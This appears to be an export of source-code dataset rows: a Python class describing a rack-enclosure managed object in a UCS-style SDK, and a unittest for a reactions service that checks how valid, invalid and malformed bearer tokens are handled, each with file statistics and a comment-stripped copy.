"operability": MoPropertyMeta("operability", "operability", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["accessibility-problem", "auto-upgrade", "backplane-port-problem", "bios-post-timeout", "chassis-intrusion", "chassis-limit-exceeded", "config", "decomissioning", "degraded", "disabled", "discovery", "discovery-failed", "equipment-problem", "fabric-conn-problem", "fabric-unsupported-conn", "identify", "identity-unestablishable", "inoperable", "link-activate-blocked", "malformed-fru", "non-optimal", "non-optimal-severe", "not-supported", "operable", "peer-comm-problem", "performance-problem", "post-failure", "power-problem", "powered-off", "removed", "thermal-problem", "unknown", "unsupported-config", "upgrade-problem", "voltage-problem"], []),
"part_number": MoPropertyMeta("part_number", "partNumber", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"presence": MoPropertyMeta("presence", "presence", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["empty", "equipped", "equipped-deprecated", "equipped-disc-error", "equipped-disc-in-progress", "equipped-disc-not-started", "equipped-disc-unknown", "equipped-identity-unestablishable", "equipped-not-primary", "equipped-slave", "equipped-unsupported", "equipped-with-malformed-fru", "inaccessible", "mismatch", "mismatch-identity-unestablishable", "mismatch-slave", "missing", "missing-slave", "not-supported", "unauthorized", "unknown"], []),
"revision": MoPropertyMeta("revision", "revision", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, 0x10, 0, 256, None, [], []),
"sacl": MoPropertyMeta("sacl", "sacl", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, None, None, r"""((none|del|mod|addchild|cascade),){0,4}(none|del|mod|addchild|cascade){0,1}""", [], []),
"serial": MoPropertyMeta("serial", "serial", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version401a, MoPropertyMeta.READ_WRITE, 0x20, None, None, r"""((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}""", [], []),
"vendor": MoPropertyMeta("vendor", "vendor", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"vid": MoPropertyMeta("vid", "vid", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
}
prop_map = {
"assetTag": "asset_tag",
"childAction": "child_action",
"dn": "dn",
"fltAggr": "flt_aggr",
"id": "id",
"mfgTime": "mfg_time",
"model": "model",
"operQualifierReason": "oper_qualifier_reason",
"operability": "operability",
"partNumber": "part_number",
"presence": "presence",
"revision": "revision",
"rn": "rn",
"sacl": "sacl",
"serial": "serial",
"status": "status",
"vendor": "vendor",
"vid": "vid",
}
def __init__(self, parent_mo_or_dn, id, **kwargs):
self._dirty_mask = 0
self.id = id
self.asset_tag = None
self.child_action = None
self.flt_aggr = None
self.mfg_time = None
self.model = None
self.oper_qualifier_reason = None
self.operability = None
self.part_number = None
self.presence = None
self.revision = None
self.sacl = None
self.serial = None
self.status = None
self.vendor = None
self.vid = None
ManagedObject.__init__(self, "EquipmentRackEnclosure", parent_mo_or_dn, **kwargs)
| 66.057971 | 805 | 0.693725 |
from ...ucsmo import ManagedObject
from ...ucscoremeta import MoPropertyMeta, MoMeta
from ...ucsmeta import VersionMeta
class EquipmentRackEnclosureConsts:
MFG_TIME_NOT_APPLICABLE = "not-applicable"
OPERABILITY_ACCESSIBILITY_PROBLEM = "accessibility-problem"
OPERABILITY_AUTO_UPGRADE = "auto-upgrade"
OPERABILITY_BACKPLANE_PORT_PROBLEM = "backplane-port-problem"
OPERABILITY_BIOS_POST_TIMEOUT = "bios-post-timeout"
OPERABILITY_CHASSIS_INTRUSION = "chassis-intrusion"
OPERABILITY_CHASSIS_LIMIT_EXCEEDED = "chassis-limit-exceeded"
OPERABILITY_CONFIG = "config"
OPERABILITY_DECOMISSIONING = "decomissioning"
OPERABILITY_DEGRADED = "degraded"
OPERABILITY_DISABLED = "disabled"
OPERABILITY_DISCOVERY = "discovery"
OPERABILITY_DISCOVERY_FAILED = "discovery-failed"
OPERABILITY_EQUIPMENT_PROBLEM = "equipment-problem"
OPERABILITY_FABRIC_CONN_PROBLEM = "fabric-conn-problem"
OPERABILITY_FABRIC_UNSUPPORTED_CONN = "fabric-unsupported-conn"
OPERABILITY_IDENTIFY = "identify"
OPERABILITY_IDENTITY_UNESTABLISHABLE = "identity-unestablishable"
OPERABILITY_INOPERABLE = "inoperable"
OPERABILITY_LINK_ACTIVATE_BLOCKED = "link-activate-blocked"
OPERABILITY_MALFORMED_FRU = "malformed-fru"
OPERABILITY_NON_OPTIMAL = "non-optimal"
OPERABILITY_NON_OPTIMAL_SEVERE = "non-optimal-severe"
OPERABILITY_NOT_SUPPORTED = "not-supported"
OPERABILITY_OPERABLE = "operable"
OPERABILITY_PEER_COMM_PROBLEM = "peer-comm-problem"
OPERABILITY_PERFORMANCE_PROBLEM = "performance-problem"
OPERABILITY_POST_FAILURE = "post-failure"
OPERABILITY_POWER_PROBLEM = "power-problem"
OPERABILITY_POWERED_OFF = "powered-off"
OPERABILITY_REMOVED = "removed"
OPERABILITY_THERMAL_PROBLEM = "thermal-problem"
OPERABILITY_UNKNOWN = "unknown"
OPERABILITY_UNSUPPORTED_CONFIG = "unsupported-config"
OPERABILITY_UPGRADE_PROBLEM = "upgrade-problem"
OPERABILITY_VOLTAGE_PROBLEM = "voltage-problem"
PRESENCE_EMPTY = "empty"
PRESENCE_EQUIPPED = "equipped"
PRESENCE_EQUIPPED_DEPRECATED = "equipped-deprecated"
PRESENCE_EQUIPPED_DISC_ERROR = "equipped-disc-error"
PRESENCE_EQUIPPED_DISC_IN_PROGRESS = "equipped-disc-in-progress"
PRESENCE_EQUIPPED_DISC_NOT_STARTED = "equipped-disc-not-started"
PRESENCE_EQUIPPED_DISC_UNKNOWN = "equipped-disc-unknown"
PRESENCE_EQUIPPED_IDENTITY_UNESTABLISHABLE = "equipped-identity-unestablishable"
PRESENCE_EQUIPPED_NOT_PRIMARY = "equipped-not-primary"
PRESENCE_EQUIPPED_SLAVE = "equipped-slave"
PRESENCE_EQUIPPED_UNSUPPORTED = "equipped-unsupported"
PRESENCE_EQUIPPED_WITH_MALFORMED_FRU = "equipped-with-malformed-fru"
PRESENCE_INACCESSIBLE = "inaccessible"
PRESENCE_MISMATCH = "mismatch"
PRESENCE_MISMATCH_IDENTITY_UNESTABLISHABLE = "mismatch-identity-unestablishable"
PRESENCE_MISMATCH_SLAVE = "mismatch-slave"
PRESENCE_MISSING = "missing"
PRESENCE_MISSING_SLAVE = "missing-slave"
PRESENCE_NOT_SUPPORTED = "not-supported"
PRESENCE_UNAUTHORIZED = "unauthorized"
PRESENCE_UNKNOWN = "unknown"
class EquipmentRackEnclosure(ManagedObject):
consts = EquipmentRackEnclosureConsts()
naming_props = set(['id'])
mo_meta = MoMeta("EquipmentRackEnclosure", "equipmentRackEnclosure", "rack-enclosure-[id]", VersionMeta.Version401a, "InputOutput", 0x3f, [], ["admin", "pn-equipment", "pn-maintenance", "pn-policy"], ['topSystem'], ['equipmentFanModule', 'equipmentPsu', 'equipmentSlotEp'], [None])
prop_meta = {
"asset_tag": MoPropertyMeta("asset_tag", "assetTag", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, None, None, r"""[ !#$%&\(\)\*\+,\-\./:;\?@\[\]_\{\|\}~a-zA-Z0-9]{0,32}""", [], []),
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version401a, MoPropertyMeta.INTERNAL, 0x2, None, None, r"""((deleteAll|ignore|deleteNonPresent),){0,2}(deleteAll|ignore|deleteNonPresent){0,1}""", [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, 0x4, 0, 256, None, [], []),
"flt_aggr": MoPropertyMeta("flt_aggr", "fltAggr", "ulong", VersionMeta.Version401a, MoPropertyMeta.INTERNAL, None, None, None, None, [], []),
"id": MoPropertyMeta("id", "id", "uint", VersionMeta.Version401a, MoPropertyMeta.NAMING, 0x8, None, None, None, [], []),
"mfg_time": MoPropertyMeta("mfg_time", "mfgTime", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, None, None, r"""([0-9]){4}-([0-9]){2}-([0-9]){2}T([0-9]){2}:([0-9]){2}:([0-9]){2}((\.([0-9]){3})){0,1}""", ["not-applicable"], []),
"model": MoPropertyMeta("model", "model", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"oper_qualifier_reason": MoPropertyMeta("oper_qualifier_reason", "operQualifierReason", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, None, None, r"""[ !#$%&\(\)\*\+,\-\./:;\?@\[\]_\{\|\}~a-zA-Z0-9]{0,256}""", [], []),
"operability": MoPropertyMeta("operability", "operability", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["accessibility-problem", "auto-upgrade", "backplane-port-problem", "bios-post-timeout", "chassis-intrusion", "chassis-limit-exceeded", "config", "decomissioning", "degraded", "disabled", "discovery", "discovery-failed", "equipment-problem", "fabric-conn-problem", "fabric-unsupported-conn", "identify", "identity-unestablishable", "inoperable", "link-activate-blocked", "malformed-fru", "non-optimal", "non-optimal-severe", "not-supported", "operable", "peer-comm-problem", "performance-problem", "post-failure", "power-problem", "powered-off", "removed", "thermal-problem", "unknown", "unsupported-config", "upgrade-problem", "voltage-problem"], []),
"part_number": MoPropertyMeta("part_number", "partNumber", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"presence": MoPropertyMeta("presence", "presence", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["empty", "equipped", "equipped-deprecated", "equipped-disc-error", "equipped-disc-in-progress", "equipped-disc-not-started", "equipped-disc-unknown", "equipped-identity-unestablishable", "equipped-not-primary", "equipped-slave", "equipped-unsupported", "equipped-with-malformed-fru", "inaccessible", "mismatch", "mismatch-identity-unestablishable", "mismatch-slave", "missing", "missing-slave", "not-supported", "unauthorized", "unknown"], []),
"revision": MoPropertyMeta("revision", "revision", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, 0x10, 0, 256, None, [], []),
"sacl": MoPropertyMeta("sacl", "sacl", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, None, None, r"""((none|del|mod|addchild|cascade),){0,4}(none|del|mod|addchild|cascade){0,1}""", [], []),
"serial": MoPropertyMeta("serial", "serial", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version401a, MoPropertyMeta.READ_WRITE, 0x20, None, None, r"""((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}""", [], []),
"vendor": MoPropertyMeta("vendor", "vendor", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"vid": MoPropertyMeta("vid", "vid", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
}
prop_map = {
"assetTag": "asset_tag",
"childAction": "child_action",
"dn": "dn",
"fltAggr": "flt_aggr",
"id": "id",
"mfgTime": "mfg_time",
"model": "model",
"operQualifierReason": "oper_qualifier_reason",
"operability": "operability",
"partNumber": "part_number",
"presence": "presence",
"revision": "revision",
"rn": "rn",
"sacl": "sacl",
"serial": "serial",
"status": "status",
"vendor": "vendor",
"vid": "vid",
}
def __init__(self, parent_mo_or_dn, id, **kwargs):
self._dirty_mask = 0
self.id = id
self.asset_tag = None
self.child_action = None
self.flt_aggr = None
self.mfg_time = None
self.model = None
self.oper_qualifier_reason = None
self.operability = None
self.part_number = None
self.presence = None
self.revision = None
self.sacl = None
self.serial = None
self.status = None
self.vendor = None
self.vid = None
ManagedObject.__init__(self, "EquipmentRackEnclosure", parent_mo_or_dn, **kwargs)
| true | true |
f7193f652b00cfdbac8c192602a1299716aac80a | 1,690 | py | Python | service/tests/test_auth.py | SWE-AGGERS/reactions_service | eb8e4bcb9f9e69c03a89da82f3c71a3454fc285c | [
"MIT"
] | null | null | null | service/tests/test_auth.py | SWE-AGGERS/reactions_service | eb8e4bcb9f9e69c03a89da82f3c71a3454fc285c | [
"MIT"
] | null | null | null | service/tests/test_auth.py | SWE-AGGERS/reactions_service | eb8e4bcb9f9e69c03a89da82f3c71a3454fc285c | [
"MIT"
] | null | null | null | import json
import unittest
import mock
from service.app import create_app
from service.auth import encode_auth_token
from service.database import empty_db
class TestAuth(unittest.TestCase):
def test0(self):
user_id = 1
# create token
new_token = encode_auth_token(user_id)
_app = create_app(debug=True)
empty_db(_app)
with _app.test_client() as client:
with mock.patch('service.views.reactions.exist_story') as exist_story_mock:
exist_story_mock.return_value = True
reply = client.post('/reactions/1/1/1', headers={'Authorization': 'Bearer ' + new_token})
body = json.loads(str(reply.data, 'utf8'))
self.assertEqual(int(body['reaction']), 1)
self.assertEqual(body['reply'], 'Reaction created!')
self.assertEqual(int(body['story_id']), 1)
# wrong token
reply = client.post('/reactions/1/1/1', headers={'Authorization': 'Bearer ' + 'a'})
body = json.loads(str(reply.data, 'utf8'))
self.assertEqual(int(body['reaction']), 1)
self.assertEqual(body['reply'], 'Provide a valid auth token!')
self.assertEqual(int(body['story_id']), 1)
# wrong token: 'Bearer token malformed!'
reply = client.post('/reactions/1/1/1', headers={'Authorization': 'a'})
body = json.loads(str(reply.data, 'utf8'))
self.assertEqual(int(body['reaction']), 1)
self.assertEqual(body['reply'], 'Bearer token malformed!')
self.assertEqual(int(body['story_id']), 1)
| 40.238095 | 105 | 0.586391 | import json
import unittest
import mock
from service.app import create_app
from service.auth import encode_auth_token
from service.database import empty_db
class TestAuth(unittest.TestCase):
def test0(self):
user_id = 1
new_token = encode_auth_token(user_id)
_app = create_app(debug=True)
empty_db(_app)
with _app.test_client() as client:
with mock.patch('service.views.reactions.exist_story') as exist_story_mock:
exist_story_mock.return_value = True
reply = client.post('/reactions/1/1/1', headers={'Authorization': 'Bearer ' + new_token})
body = json.loads(str(reply.data, 'utf8'))
self.assertEqual(int(body['reaction']), 1)
self.assertEqual(body['reply'], 'Reaction created!')
self.assertEqual(int(body['story_id']), 1)
reply = client.post('/reactions/1/1/1', headers={'Authorization': 'Bearer ' + 'a'})
body = json.loads(str(reply.data, 'utf8'))
self.assertEqual(int(body['reaction']), 1)
self.assertEqual(body['reply'], 'Provide a valid auth token!')
self.assertEqual(int(body['story_id']), 1)
reply = client.post('/reactions/1/1/1', headers={'Authorization': 'a'})
body = json.loads(str(reply.data, 'utf8'))
self.assertEqual(int(body['reaction']), 1)
self.assertEqual(body['reply'], 'Bearer token malformed!')
self.assertEqual(int(body['story_id']), 1)
| true | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.